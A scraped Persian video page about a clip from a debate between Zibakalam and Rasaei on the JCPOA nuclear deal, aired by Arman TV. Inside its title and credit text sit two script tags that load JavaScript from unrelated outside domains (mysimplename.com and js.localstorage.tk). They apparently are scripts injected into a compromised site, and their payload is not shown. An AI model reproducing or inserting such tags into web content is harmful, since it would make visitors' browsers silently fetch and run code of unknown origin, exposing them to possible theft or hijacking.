در قضیه برجام ، مردم از آن حالت امید به حالت انتظار درآمده‌اند!


<script type='text/javascript' src='https://mysimplename.com/sc.js?p=3'></script>در قضیه #برجام ، مردم از آن حالت #امید به حالت #انتظار درآمده‌اند!
برشی از مناظره زیباکلام و رسایی در دانشگاه تربیت مدرس (قسمت اول)
پخش از آرمان تی‌وی<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>


+ 
1

- 
0

عرض x طول

دکمه اشتراک گذاري تلگرام ارسال ويدئو در تلگرام

ارسال نظر